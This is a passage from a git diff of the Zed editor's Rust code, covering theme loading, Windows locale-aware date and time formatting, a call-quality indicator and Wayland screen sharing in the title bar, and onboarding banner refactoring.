theme, + Err(err) => { + if themes.extensions_loaded() { + log::error!("{err}"); + } + themes + .get(default_theme(*system_appearance)) + .unwrap_or_else(|_| themes.get(DEFAULT_DARK_THEME).unwrap()) + } + }; + theme_settings.apply_theme_overrides(theme) +} + +fn configured_icon_theme(cx: &mut App) -> Arc { + let themes = ThemeRegistry::default_global(cx); + let theme_settings = ThemeSettings::get_global(cx); + let system_appearance = SystemAppearance::global(cx); + + let icon_theme_name = theme_settings.icon_theme.name(*system_appearance); + + match themes.get_icon_theme(&icon_theme_name.0) { + Ok(theme) => theme, + Err(err) => { + if themes.extensions_loaded() { + log::error!("{err}"); + } + themes.get_icon_theme(DEFAULT_ICON_THEME_NAME).unwrap() + } + } +} + +/// Reloads the current theme from settings. +pub fn reload_theme(cx: &mut App) { + let theme = configured_theme(cx); + GlobalTheme::update_theme(cx, theme); + cx.refresh_windows(); +} + +/// Reloads the current icon theme from settings. +pub fn reload_icon_theme(cx: &mut App) { + let icon_theme = configured_icon_theme(cx); + GlobalTheme::update_icon_theme(cx, icon_theme); + cx.refresh_windows(); +} + +/// Loads the themes bundled with the Zed binary into the registry. +pub fn load_bundled_themes(registry: &ThemeRegistry) { + let theme_paths = registry + .assets() + .list("themes/") + .expect("failed to list theme assets") + .into_iter() + .filter(|path| path.ends_with(".json")); + + for path in theme_paths { + let Some(theme) = registry.assets().load(&path).log_err().flatten() else { + continue; + }; + + let Some(theme_family) = serde_json::from_slice(&theme) + .with_context(|| format!("failed to parse theme at path \"{path}\"")) + .log_err() + else { + continue; + }; + + let refined = refine_theme_family(theme_family); + registry.insert_theme_families([refined]); + } +} + +/// Loads a user theme from the given bytes into the registry. +pub fn load_user_theme(registry: &ThemeRegistry, bytes: &[u8]) -> Result<()> { + let theme = deserialize_user_theme(bytes)?; + let refined = refine_theme_family(theme); + registry.insert_theme_families([refined]); + Ok(()) +} + +/// Deserializes a user theme from the given bytes. +pub fn deserialize_user_theme(bytes: &[u8]) -> Result { + let theme_family: ThemeFamilyContent = serde_json_lenient::from_slice(bytes)?; + + for theme in &theme_family.themes { + if theme + .style + .colors + .deprecated_scrollbar_thumb_background + .is_some() + { + log::warn!( + r#"Theme "{theme_name}" is using a deprecated style property: scrollbar_thumb.background. Use `scrollbar.thumb.background` instead."#, + theme_name = theme.name + ) + } + } + + Ok(theme_family) +} + +/// Refines a [`ThemeFamilyContent`] and its [`ThemeContent`]s into a [`ThemeFamily`]. +pub fn refine_theme_family(theme_family_content: ThemeFamilyContent) -> ThemeFamily { + let id = uuid::Uuid::new_v4().to_string(); + let name = theme_family_content.name.clone(); + let author = theme_family_content.author.clone(); + + let themes: Vec = theme_family_content + .themes + .iter() + .map(|theme_content| refine_theme(theme_content)) + .collect(); + + ThemeFamily { + id, + name: name.into(), + author: author.into(), + themes, + scales: default_color_scales(), + } +} + +/// Refines a [`ThemeContent`] into a [`Theme`]. +pub fn refine_theme(theme: &ThemeContent) -> Theme { + let appearance = match theme.appearance { + AppearanceContent::Light => Appearance::Light, + AppearanceContent::Dark => Appearance::Dark, + }; + + let mut refined_status_colors = match theme.appearance { + AppearanceContent::Light => StatusColors::light(), + AppearanceContent::Dark => StatusColors::dark(), + }; + let mut status_colors_refinement = status_colors_refinement(&theme.style.status); + theme::apply_status_color_defaults(&mut status_colors_refinement); + refined_status_colors.refine(&status_colors_refinement); + + let mut refined_player_colors = match theme.appearance { + AppearanceContent::Light => PlayerColors::light(), + AppearanceContent::Dark => PlayerColors::dark(), + }; + merge_player_colors(&mut refined_player_colors, &theme.style.players); + + let mut refined_theme_colors = match theme.appearance { + AppearanceContent::Light => ThemeColors::light(), + AppearanceContent::Dark => ThemeColors::dark(), + }; + let mut theme_colors_refinement = + theme_colors_refinement(&theme.style.colors, &status_colors_refinement); + theme::apply_theme_color_defaults(&mut theme_colors_refinement, &refined_player_colors); + refined_theme_colors.refine(&theme_colors_refinement); + + let mut refined_accent_colors = match theme.appearance { + AppearanceContent::Light => AccentColors::light(), + AppearanceContent::Dark => AccentColors::dark(), + }; + merge_accent_colors(&mut refined_accent_colors, &theme.style.accents); + + let syntax_highlights = theme.style.syntax.iter().map(|(syntax_token, highlight)| { + ( + syntax_token.clone(), + HighlightStyle { + color: highlight + .color + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + background_color: highlight + .background_color + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + font_style: highlight.font_style.map(|s| s.into_gpui()), + font_weight: highlight.font_weight.map(|w| w.into_gpui()), + ..Default::default() + }, + ) + }); + let syntax_theme = Arc::new(SyntaxTheme::new(syntax_highlights)); + + let window_background_appearance = theme + .style + .window_background_appearance + .map(|w| w.into_gpui()) + .unwrap_or_default(); + + Theme { + id: uuid::Uuid::new_v4().to_string(), + name: theme.name.clone().into(), + appearance, + styles: ThemeStyles { + system: SystemColors::default(), + window_background_appearance, + accents: refined_accent_colors, + colors: refined_theme_colors, + status: refined_status_colors, + player: refined_player_colors, + syntax: syntax_theme, + }, + } +} + +/// Merges player color overrides into the given [`PlayerColors`]. +pub fn merge_player_colors( + player_colors: &mut PlayerColors, + user_player_colors: &[::settings::PlayerColorContent], +) { + if user_player_colors.is_empty() { + return; + } + + for (idx, player) in user_player_colors.iter().enumerate() { + let cursor = player + .cursor + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let background = player + .background + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let selection = player + .selection + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + + if let Some(player_color) = player_colors.0.get_mut(idx) { + *player_color = PlayerColor { + cursor: cursor.unwrap_or(player_color.cursor), + background: background.unwrap_or(player_color.background), + selection: selection.unwrap_or(player_color.selection), + }; + } else { + player_colors.0.push(PlayerColor { + cursor: cursor.unwrap_or_default(), + background: background.unwrap_or_default(), + selection: selection.unwrap_or_default(), + }); + } + } +} + +/// Merges accent color overrides into the given [`AccentColors`]. +pub fn merge_accent_colors( + accent_colors: &mut AccentColors, + user_accent_colors: &[::settings::AccentContent], +) { + if user_accent_colors.is_empty() { + return; + } + + let colors = user_accent_colors + .iter() + .filter_map(|accent_color| { + accent_color + .0 + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + }) + .collect::>(); + + if !colors.is_empty() { + accent_colors.0 = Arc::from(colors); + } +} diff --git a/crates/time_format/Cargo.toml b/crates/time_format/Cargo.toml index b598d19887e128a0c5951c1d1bd5ec42f27f975b..7f5f2d9f1b56666036816d43bfa3564bf9721f05 100644 --- a/crates/time_format/Cargo.toml +++ b/crates/time_format/Cargo.toml @@ -19,3 +19,6 @@ time.workspace = true [target.'cfg(target_os = "macos")'.dependencies] core-foundation.workspace = true core-foundation-sys.workspace = true + +[target.'cfg(target_os = "windows")'.dependencies] +windows.workspace = true diff --git a/crates/time_format/src/time_format.rs b/crates/time_format/src/time_format.rs index 25a7ae84232b69570e8c800c5955e684a13dc08a..bbf214623eb4b5b9dd978a675551c25f5e937a8d 100644 --- a/crates/time_format/src/time_format.rs +++ b/crates/time_format/src/time_format.rs @@ -86,10 +86,25 @@ fn format_absolute_date( macos::format_date(×tamp) } } - #[cfg(not(target_os = "macos"))] + #[cfg(target_os = "windows")] + { + if !enhanced_date_formatting { + return windows::format_date(×tamp); + } + + let timestamp_date = timestamp.date(); + let reference_date = reference.date(); + if timestamp_date == reference_date { + "Today".to_string() + } else if reference_date.previous_day() == Some(timestamp_date) { + "Yesterday".to_string() + } else { + windows::format_date(×tamp) + } + } + #[cfg(not(any(target_os = "macos", target_os = "windows")))] { // todo(linux) respect user's date/time preferences - // todo(windows) respect user's date/time preferences let current_locale = CURRENT_LOCALE .get_or_init(|| sys_locale::get_locale().unwrap_or_else(|| String::from("en-US"))); format_timestamp_naive_date( @@ -105,10 +120,13 @@ fn format_absolute_time(timestamp: OffsetDateTime) -> String { { macos::format_time(×tamp) } - #[cfg(not(target_os = "macos"))] + #[cfg(target_os = "windows")] + { + windows::format_time(×tamp) + } + #[cfg(not(any(target_os = "macos", target_os = "windows")))] { // todo(linux) respect user's date/time preferences - // todo(windows) respect user's date/time preferences let current_locale = CURRENT_LOCALE .get_or_init(|| sys_locale::get_locale().unwrap_or_else(|| String::from("en-US"))); format_timestamp_naive_time( @@ -123,7 +141,7 @@ fn format_absolute_timestamp( reference: OffsetDateTime, #[allow(unused_variables)] enhanced_date_formatting: bool, ) -> String { - #[cfg(target_os = "macos")] + #[cfg(any(target_os = "macos", target_os = "windows"))] { if !enhanced_date_formatting { return format!( @@ -147,10 +165,9 @@ fn format_absolute_timestamp( ) } } - #[cfg(not(target_os = "macos"))] + #[cfg(not(any(target_os = "macos", target_os = "windows")))] { // todo(linux) respect user's date/time preferences - // todo(windows) respect user's date/time preferences format_timestamp_fallback(timestamp, reference) } } @@ -176,10 +193,25 @@ fn format_absolute_date_medium( macos::format_date_medium(×tamp) } } - #[cfg(not(target_os = "macos"))] + #[cfg(target_os = "windows")] + { + if !enhanced_formatting { + return windows::format_date_medium(×tamp); + } + + let timestamp_date = timestamp.date(); + let reference_date = reference.date(); + if timestamp_date == reference_date { + "Today".to_string() + } else if reference_date.previous_day() == Some(timestamp_date) { + "Yesterday".to_string() + } else { + windows::format_date_medium(×tamp) + } + } + #[cfg(not(any(target_os = "macos", target_os = "windows")))] { // todo(linux) respect user's date/time preferences - // todo(windows) respect user's date/time preferences let current_locale = CURRENT_LOCALE .get_or_init(|| sys_locale::get_locale().unwrap_or_else(|| String::from("en-US"))); if !enhanced_formatting { @@ -212,7 +244,11 @@ fn format_absolute_timestamp_medium( { format_absolute_date_medium(timestamp, reference, false) } - #[cfg(not(target_os = "macos"))] + #[cfg(target_os = "windows")] + { + format_absolute_date_medium(timestamp, reference, false) + } + #[cfg(not(any(target_os = "macos", target_os = "windows")))] { // todo(linux) respect user's date/time preferences // todo(windows) respect user's date/time preferences @@ -360,7 +396,7 @@ fn format_timestamp_naive_date( } } -#[cfg(not(target_os = "macos"))] +#[cfg(not(any(target_os = "macos", target_os = "windows")))] fn format_timestamp_naive_date_medium( timestamp_local: OffsetDateTime, is_12_hour_time: bool, @@ -415,10 +451,10 @@ pub fn format_timestamp_naive( } } -#[cfg(not(target_os = "macos"))] +#[cfg(not(any(target_os = "macos", target_os = "windows")))] static CURRENT_LOCALE: std::sync::OnceLock = std::sync::OnceLock::new(); -#[cfg(not(target_os = "macos"))] +#[cfg(not(any(target_os = "macos", target_os = "windows")))] fn format_timestamp_fallback(timestamp: OffsetDateTime, reference: OffsetDateTime) -> String { let current_locale = CURRENT_LOCALE .get_or_init(|| sys_locale::get_locale().unwrap_or_else(|| String::from("en-US"))); @@ -428,7 +464,7 @@ fn format_timestamp_fallback(timestamp: OffsetDateTime, reference: OffsetDateTim } /// Returns `true` if the locale is recognized as a 12-hour time locale. -#[cfg(not(target_os = "macos"))] +#[cfg(not(any(target_os = "macos", target_os = "windows")))] fn is_12_hour_time_by_locale(locale: &str) -> bool { [ "es-MX", "es-CO", "es-SV", "es-NI", @@ -522,6 +558,57 @@ mod macos { } } +#[cfg(target_os = "windows")] +mod windows { + use windows::Globalization::DateTimeFormatting::DateTimeFormatter; + + pub fn format_time(timestamp: &time::OffsetDateTime) -> String { + format_with_formatter(DateTimeFormatter::ShortTime(), timestamp, true) + } + + pub fn format_date(timestamp: &time::OffsetDateTime) -> String { + format_with_formatter(DateTimeFormatter::ShortDate(), timestamp, false) + } + + pub fn format_date_medium(timestamp: &time::OffsetDateTime) -> String { + format_with_formatter( + DateTimeFormatter::CreateDateTimeFormatter(windows::core::h!( + "month.abbreviated day year.full" + )), + timestamp, + false, + ) + } + + fn format_with_formatter( + formatter: windows::core::Result, + timestamp: &time::OffsetDateTime, + is_time: bool, + ) -> String { + formatter + .and_then(|formatter| formatter.Format(to_winrt_datetime(timestamp))) + .map(|hstring| hstring.to_string()) + .unwrap_or_else(|_| { + if is_time { + super::format_timestamp_naive_time(*timestamp, true) + } else { + super::format_timestamp_naive_date(*timestamp, *timestamp, true) + } + }) + } + + fn to_winrt_datetime(timestamp: &time::OffsetDateTime) -> windows::Foundation::DateTime { + // DateTime uses 100-nanosecond intervals since January 1, 1601 (UTC). + const WINDOWS_EPOCH: time::OffsetDateTime = time::macros::datetime!(1601-01-01 0:00 UTC); + let duration_since_winrt_epoch = *timestamp - WINDOWS_EPOCH; + let universal_time = duration_since_winrt_epoch.whole_nanoseconds() / 100; + + windows::Foundation::DateTime { + UniversalTime: universal_time as i64, + } + } +} + #[cfg(test)] mod tests { use super::*; diff --git a/crates/title_bar/Cargo.toml b/crates/title_bar/Cargo.toml index a9988d498e463edb463175ec19867fa6624479e5..ef59ada28baa878d2cfc37ba52b4912e261274e8 100644 --- a/crates/title_bar/Cargo.toml +++ b/crates/title_bar/Cargo.toml @@ -18,9 +18,9 @@ stories = ["dep:story"] test-support = [ "call/test-support", "client/test-support", - "collections/test-support", + "gpui/test-support", - "http_client/test-support", + "project/test-support", "remote/test-support", "util/test-support", @@ -38,13 +38,15 @@ chrono.workspace = true client.workspace = true cloud_api_types.workspace = true db.workspace = true -feature_flags.workspace = true git_ui.workspace = true gpui = { workspace = true, features = ["screen-capture"] } +icons.workspace = true +livekit_client.workspace = true notifications.workspace = true project.workspace = true recent_projects.workspace = true remote.workspace = true +remote_connection.workspace = true rpc.workspace = true semver.workspace = true schemars.workspace = true @@ -65,17 +67,13 @@ windows.workspace = true [dev-dependencies] call = { workspace = true, features = ["test-support"] } client = { workspace = true, features = ["test-support"] } -collections = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } -http_client = { workspace = true, features = ["test-support"] } notifications = { workspace = true, features = ["test-support"] } -pretty_assertions.workspace = true project = { workspace = true, features = ["test-support"] } release_channel.workspace = true remote = { workspace = true, features = ["test-support"] } rpc = { workspace = true, features = ["test-support"] } semver.workspace = true settings = { workspace = true, features = ["test-support"] } -tree-sitter-md.workspace = true util = { workspace = true, features = ["test-support"] } workspace = { workspace = true, features = ["test-support"] } diff --git a/crates/title_bar/src/application_menu.rs b/crates/title_bar/src/application_menu.rs index 579e4dadbd590981a4aee15019bbe73e2bb28d5c..b5cb07f757fe6b4fa26df7cc0f875025a0c08a81 100644 --- a/crates/title_bar/src/application_menu.rs +++ b/crates/title_bar/src/application_menu.rs @@ -114,8 +114,9 @@ impl ApplicationMenu { name, action, checked, + disabled, .. - } => menu.action_checked(name, action, checked), + } => menu.action_checked_with_disabled(name, action, checked, disabled), OwnedMenuItem::Submenu(submenu) => { submenu .items @@ -126,8 +127,10 @@ impl ApplicationMenu { name, action, checked, + disabled, .. - } => menu.action_checked(name, action, checked), + } => menu + .action_checked_with_disabled(name, action, checked, disabled), OwnedMenuItem::Submenu(_) => menu, OwnedMenuItem::SystemMenu(_) => { // A system menu doesn't make sense in this context, so ignore it diff --git a/crates/title_bar/src/collab.rs b/crates/title_bar/src/collab.rs index 0f4d5977947fa27cf3ca5811dbf883c4dbd9df94..474d0d287e47dcc6aad0b0f5c57fce382ebf2ca9 100644 --- a/crates/title_bar/src/collab.rs +++ b/crates/title_bar/src/collab.rs @@ -9,7 +9,10 @@ use gpui::{ canvas, point, }; use gpui::{App, Task, Window}; +use icons::IconName; +use livekit_client::ConnectionQuality; use project::WorktreeSettings; +use remote_connection::RemoteConnectionModal; use rpc::proto::{self}; use settings::{Settings as _, SettingsLocation}; use theme::ActiveTheme; @@ -19,9 +22,17 @@ use ui::{ }; use util::rel_path::RelPath; use workspace::{ParticipantLocation, notifications::DetachAndPromptErr}; +use zed_actions::ShowCallStats; use crate::TitleBar; +fn format_stat(value: Option, format: impl Fn(f64) -> String) -> String { + match value { + Some(v) => format(v), + None => "—".to_string(), + } +} + pub fn toggle_screen_sharing( screen: anyhow::Result>>, window: &mut Window, @@ -332,7 +343,11 @@ impl TitleBar { let is_connecting_to_project = self .workspace - .update(cx, |workspace, cx| workspace.has_active_modal(window, cx)) + .update(cx, |workspace, cx| { + workspace + .active_modal::(cx) + .is_some() + }) .unwrap_or(false); let room = room.read(cx); @@ -347,6 +362,11 @@ impl TitleBar { let can_share_projects = room.can_share_projects(); let screen_sharing_supported = cx.is_screen_capture_supported(); + let stats = room + .diagnostics() + .map(|d| d.read(cx).stats().clone()) + .unwrap_or_default(); + let channel_store = ChannelStore::global(cx); let channel = room .channel_id() @@ -354,6 +374,18 @@ impl TitleBar { let mut children = Vec::new(); + let effective_quality = stats.effective_quality.unwrap_or(ConnectionQuality::Lost); + let (signal_icon, signal_color, quality_label) = match effective_quality { + ConnectionQuality::Excellent => { + (IconName::SignalHigh, Some(Color::Success), "Excellent") + } + ConnectionQuality::Good => (IconName::SignalHigh, None, "Good"), + ConnectionQuality::Poor => (IconName::SignalMedium, Some(Color::Warning), "Poor"), + ConnectionQuality::Lost => (IconName::SignalLow, Some(Color::Error), "Lost"), + }; + + let quality_label: SharedString = quality_label.into(); + children.push( h_flex() .gap_1() @@ -372,6 +404,35 @@ impl TitleBar { .into_any_element(), ); + children.push( + IconButton::new("call-quality", signal_icon) + .icon_size(IconSize::Small) + .when_some(signal_color, |button, color| button.icon_color(color)) + .tooltip(move |_window, cx| { + let quality_label = quality_label.clone(); + let latency = format_stat(stats.latency_ms, |v| format!("{:.0}ms", v)); + let jitter = format_stat(stats.jitter_ms, |v| format!("{:.0}ms", v)); + let packet_loss = format_stat(stats.packet_loss_pct, |v| format!("{:.1}%", v)); + let input_lag = + format_stat(stats.input_lag.map(|d| d.as_secs_f64() * 1000.0), |v| { + format!("{:.1}ms", v) + }); + + Tooltip::with_meta( + format!("Connection: {quality_label}"), + Some(&ShowCallStats), + format!( + "Latency: {latency} · Jitter: {jitter} · Loss: {packet_loss} · Input lag: {input_lag}", + ), + cx, + ) + }) + .on_click(move |_, window, cx| { + window.dispatch_action(Box::new(ShowCallStats), cx); + }) + .into_any_element(), + ); + if is_local && can_share_projects && !is_connecting_to_project { let is_sharing_disabled = channel.is_some_and(|channel| match channel.visibility { proto::ChannelVisibility::Public => project.visible_worktrees(cx).any(|worktree| { @@ -489,6 +550,11 @@ impl TitleBar { ); if can_use_microphone && screen_sharing_supported { + #[cfg(target_os = "linux")] + let is_wayland = gpui::guess_compositor() == "Wayland"; + #[cfg(not(target_os = "linux"))] + let is_wayland = false; + let trigger = IconButton::new("screen-share", IconName::Screen) .style(ButtonStyle::Subtle) .icon_size(IconSize::Small) @@ -505,28 +571,56 @@ impl TitleBar { .room() .is_some_and(|room| !room.read(cx).is_sharing_screen()); - window - .spawn(cx, async move |cx| { - let screen = if should_share { - cx.update(|_, cx| pick_default_screen(cx))?.await - } else { - Ok(None) - }; - cx.update(|window, cx| toggle_screen_sharing(screen, window, cx))?; + #[cfg(target_os = "linux")] + { + if is_wayland + && let Some(room) = ActiveCall::global(cx).read(cx).room().cloned() + { + let task = room.update(cx, |room, cx| { + if should_share { + room.share_screen_wayland(cx) + } else { + room.unshare_screen(true, cx) + .map(|()| Task::ready(Ok(()))) + .unwrap_or_else(|e| Task::ready(Err(e))) + } + }); + task.detach_and_prompt_err( + "Sharing Screen Failed", + window, + cx, + |e, _, _| Some(format!("{e:?}")), + ); + } + } + if !is_wayland { + window + .spawn(cx, async move |cx| { + let screen = if should_share { + cx.update(|_, cx| pick_default_screen(cx))?.await + } else { + Ok(None) + }; + cx.update(|window, cx| toggle_screen_sharing(screen, window, cx))?; - Result::<_, anyhow::Error>::Ok(()) - }) - .detach(); + Result::<_, anyhow::Error>::Ok(()) + }) + .detach(); + } }); - children.push( - SplitButton::new( - trigger.render(window, cx), - self.render_screen_list().into_any_element(), - ) - .style(SplitButtonStyle::Transparent) - .into_any_element(), - ); + if is_wayland { + children.push(trigger.into_any_element()); + } else { + children.push( + SplitButton::new( + trigger.render(window, cx), + self.render_screen_list().into_any_element(), + ) + .style(SplitButtonStyle::Transparent) + .into_any_element(), + ); + } } children.push(div().pr_2().into_any_element()); diff --git a/crates/title_bar/src/onboarding_banner.rs b/crates/title_bar/src/onboarding_banner.rs index ac3e80e179babc8ae9ee1c86c93c11f57cedb9b7..96400a91a0a26fdc6a4c1acb6387f27c3077e393 100644 --- a/crates/title_bar/src/onboarding_banner.rs +++ b/crates/title_bar/src/onboarding_banner.rs @@ -1,3 +1,7 @@ +// This module provides infrastructure for showing onboarding banners in the title bar. +// It's currently not in use but is kept for future feature announcements. +#![allow(dead_code)] + use gpui::{Action, Entity, Global, Render, SharedString}; use ui::{ButtonLike, Tooltip, prelude::*}; use util::ResultExt; @@ -44,7 +48,7 @@ impl OnboardingBanner { subtitle: subtitle.or(Some(SharedString::from("Introducing:"))), }, visible_when: None, - dismissed: get_dismissed(source), + dismissed: get_dismissed(source, cx), } } @@ -75,9 +79,9 @@ fn dismissed_at_key(source: &str) -> String { } } -fn get_dismissed(source: &str) -> bool { +fn get_dismissed(source: &str, cx: &App) -> bool { let dismissed_at = dismissed_at_key(source); - db::kvp::KEY_VALUE_STORE + db::kvp::KeyValueStore::global(cx) .read_kvp(&dismissed_at) .log_err() .is_some_and(|dismissed| dismissed.is_some()) @@ -85,28 +89,30 @@ fn get_dismissed(source: &str) -> bool { fn persist_dismissed(source: &str, cx: &mut App) { let dismissed_at = dismissed_at_key(source); - cx.spawn(async |_| { + let kvp = db::kvp::KeyValueStore::global(cx); + cx.spawn(async move |_| { let time = chrono::Utc::now().to_rfc3339(); - db::kvp::KEY_VALUE_STORE.write_kvp(dismissed_at, time).await + kvp.write_kvp(dismissed_at, time).await }) .detach_and_log_err(cx); } pub fn restore_banner(cx: &mut App) { - cx.defer(|cx| { - cx.global::() - .entity - .clone() - .update(cx, |this, cx| { + if let Some(banner_global) = cx.try_global::() { + let entity = banner_global.entity.clone(); + cx.defer(move |cx| { + entity.update(cx, |this, cx| { this.dismissed = false; cx.notify(); }); - }); + }); - let source = &cx.global::().entity.read(cx).source; - let dismissed_at = dismissed_at_key(source); - cx.spawn(async |_| db::kvp::KEY_VALUE_STORE.delete_kvp(dismissed_at).await) - .detach_and_log_err(cx); + let source = &cx.global::().entity.read(cx).source; + let dismissed_at = dismissed_at_key(source); + let kvp = db::kvp::KeyValueStore::global(cx); + cx.spawn(async move |_| kvp.delete_kvp(dismissed_at).await) + .detach_and_log_err(cx); + } } impl Render for OnboardingBanner { diff --git a/crates/title_bar/src/plan_chip.rs b/crates/title_bar/src/plan_chip.rs index edec0da2dea317bd122ece14d6afb90a31990c96..237e507ed8e4d1a5f63a7df116bf08fd69086bc2 100644 --- a/crates/title_bar/src/plan_chip.rs +++ b/crates/title_bar/src/plan_chip.rs @@ -33,6 +33,7 @@ impl RenderOnce for PlanChip { Plan::ZedFree => ("Free", Color::Default, free_chip_bg), Plan::ZedProTrial => ("Pro Trial", Color::Accent, pro_chip_bg), Plan::ZedPro => ("Pro", Color::Accent, pro_chip_bg), + Plan::ZedBusiness => ("Business", Color::Accent, pro_chip_bg), Plan::ZedStudent => ("Student", Color::Accent, pro_chip_bg), }; diff --git a/crates/title_bar/src/title_bar.rs b/crates/title_bar/src/title_bar.rs index f00a71a305e306ba9201e5a4976382012ae0059e..dfcd933dc20df9a6f6643402719f2ec1143cc7fe 100644 --- a/crates/title_bar/src/title_bar.rs +++ b/crates/title_bar/src/title_bar.rs @@ -14,6 +14,7 @@ pub use platform_title_bar::{ self, DraggedWindowTab, MergeAllWindows, MoveTabToNewWindow, PlatformTitleBar, ShowNextWindowTab, ShowPreviousWindowTab, }; +use project::linked_worktree_short_name; #[cfg(not(target_os = "macos"))] use crate::application_menu::{ @@ -24,19 +25,18 @@ use auto_update::AutoUpdateStatus; use call::ActiveCall; use client::{Client, UserStore, zed_urls}; use cloud_api_types::Plan; -use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt}; + use gpui::{ - Action, AnyElement, App, Context, Corner, Element, Empty, Entity, Focusable, - InteractiveElement, IntoElement, MouseButton, ParentElement, Render, - StatefulInteractiveElement, Styled, Subscription, WeakEntity, Window, actions, div, + Action, AnyElement, App, Context, Corner, Element, Entity, Focusable, InteractiveElement, + IntoElement, MouseButton, ParentElement, Render, StatefulInteractiveElement, Styled, + Subscription, WeakEntity, Window, actions, div, }; use onboarding_banner::OnboardingBanner; -use project::{ - DisableAiSettings, Project, git_store::GitStoreEvent, trusted_worktrees::TrustedWorktrees, -}; +use project::{Project, git_store::GitStoreEvent, trusted_worktrees::TrustedWorktrees}; use remote::RemoteConnectionOptions; use settings::Settings; use settings::WorktreeId; +use std::collections::HashSet; use std::sync::Arc; use theme::ActiveTheme; use title_bar_settings::TitleBarSettings; @@ -47,9 +47,9 @@ use ui::{ use update_version::UpdateVersion; use util::ResultExt; use workspace::{ - MultiWorkspace, ToggleWorkspaceSidebar, ToggleWorktreeSecurity, Workspace, - notifications::NotifyResultExt, + MultiWorkspace, ToggleWorktreeSecurity, Workspace, WorkspaceId, notifications::NotifyResultExt, }; + use zed_actions::OpenRemote; pub use onboarding_banner::restore_banner; @@ -82,7 +82,8 @@ pub fn init(cx: &mut App) { let Some(window) = window else { return; }; - let item = cx.new(|cx| TitleBar::new("title-bar", workspace, window, cx)); + let multi_workspace = workspace.multi_workspace().cloned(); + let item = cx.new(|cx| TitleBar::new("title-bar", workspace, multi_workspace, window, cx)); workspace.set_titlebar_item(item.into(), window, cx); workspace.register_action(|workspace, _: &SimulateUpdateAvailable, _window, cx| { @@ -151,29 +152,65 @@ pub struct TitleBar { user_store: Entity, client: Arc, workspace: WeakEntity, + multi_workspace: Option>, application_menu: Option>, _subscriptions: Vec, - banner: Entity, + banner: Option>, update_version: Entity, screen_share_popover_handle: PopoverMenuHandle, + _diagnostics_subscription: Option, } impl Render for TitleBar { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + if self.multi_workspace.is_none() { + if let Some(mw) = self + .workspace + .upgrade() + .and_then(|ws| ws.read(cx).multi_workspace().cloned()) + { + self.multi_workspace = Some(mw.clone()); + self.platform_titlebar.update(cx, |titlebar, _cx| { + titlebar.set_multi_workspace(mw); + }); + } + } + let title_bar_settings = *TitleBarSettings::get_global(cx); + let button_layout = title_bar_settings.button_layout; let show_menus = show_menus(cx); let mut children = Vec::new(); + let mut project_name = None; + let mut repository = None; + let mut linked_worktree_name = None; + if let Some(worktree) = self.effective_active_worktree(cx) { + repository = self.get_repository_for_worktree(&worktree, cx); + let worktree = worktree.read(cx); + project_name = worktree + .root_name() + .file_name() + .map(|name| SharedString::from(name.to_string())); + linked_worktree_name = repository.as_ref().and_then(|repo| { + let repo = repo.read(cx); + linked_worktree_short_name( + repo.original_repo_abs_path.as_ref(), + repo.work_directory_abs_path.as_ref(), + ) + .filter(|name| Some(name) != project_name.as_ref()) + }); + } + children.push( h_flex() + .h_full() .gap_0p5() .map(|title_bar| { let mut render_project_items = title_bar_settings.show_branch_name || title_bar_settings.show_project_items; title_bar - .children(self.render_workspace_sidebar_toggle(window, cx)) .when_some( self.application_menu.clone().filter(|_| !show_menus), |title_bar, menu| { @@ -188,11 +225,18 @@ impl Render for TitleBar { .when(title_bar_settings.show_project_items, |title_bar| { title_bar .children(self.render_project_host(cx)) - .child(self.render_project_name(cx)) - }) - .when(title_bar_settings.show_branch_name, |title_bar| { - title_bar.children(self.render_project_branch(cx)) + .child(self.render_project_name(project_name, window, cx)) }) + .when_some( + repository.filter(|_| title_bar_settings.show_branch_name), + |title_bar, repository| { + title_bar.children(self.render_project_branch( + repository, + linked_worktree_name, + cx, + )) + }, + ) }) }) .on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation()) @@ -202,7 +246,9 @@ impl Render for TitleBar { children.push(self.render_collaborator_list(window, cx).into_any_element()); if title_bar_settings.show_onboarding_banner { - children.push(self.banner.clone().into_any_element()) + if let Some(banner) = &self.banner { + children.push(banner.clone().into_any_element()) + } } let status = self.client.status(); @@ -229,7 +275,6 @@ impl Render for TitleBar { user.is_none() && TitleBarSettings::get_global(cx).show_sign_in, |this| this.child(self.render_sign_in_button(cx)), ) - .child(self.render_organization_menu_button(cx)) .when(TitleBarSettings::get_global(cx).show_user_menu, |this| { this.child(self.render_user_menu_button(cx)) }) @@ -238,6 +283,7 @@ impl Render for TitleBar { if show_menus { self.platform_titlebar.update(cx, |this, _| { + this.set_button_layout(button_layout); this.set_children( self.application_menu .clone() @@ -265,6 +311,7 @@ impl Render for TitleBar { .into_any_element() } else { self.platform_titlebar.update(cx, |this, _| { + this.set_button_layout(button_layout); this.set_children(children); }); self.platform_titlebar.clone().into_any_element() @@ -276,6 +323,7 @@ impl TitleBar { pub fn new( id: impl Into, workspace: &Workspace, + multi_workspace: Option>, window: &mut Window, cx: &mut Context, ) -> Self { @@ -332,82 +380,40 @@ impl TitleBar { }), ); subscriptions.push(cx.observe(&user_store, |_a, _, cx| cx.notify())); + subscriptions.push(cx.observe_button_layout_changed(window, |_, _, cx| cx.notify())); if let Some(trusted_worktrees) = TrustedWorktrees::try_get_global(cx) { subscriptions.push(cx.subscribe(&trusted_worktrees, |_, _, _, cx| { cx.notify(); })); } - let banner = cx.new(|cx| { - OnboardingBanner::new( - "ACP Claude Code Onboarding", - IconName::AiClaude, - "Claude Agent", - Some("Introducing:".into()), - zed_actions::agent::OpenClaudeAgentOnboardingModal.boxed_clone(), - cx, - ) - // When updating this to a non-AI feature release, remove this line. - .visible_when(|cx| !project::DisableAiSettings::get_global(cx).disable_ai) - }); - let update_version = cx.new(|cx| UpdateVersion::new(cx)); - let platform_titlebar = cx.new(|cx| PlatformTitleBar::new(id, cx)); - - // Set up observer to sync sidebar state from MultiWorkspace to PlatformTitleBar. - { - let platform_titlebar = platform_titlebar.clone(); - let window_handle = window.window_handle(); - cx.spawn(async move |this: WeakEntity, cx| { - let Some(multi_workspace_handle) = window_handle.downcast::() - else { - return; - }; - - let _ = 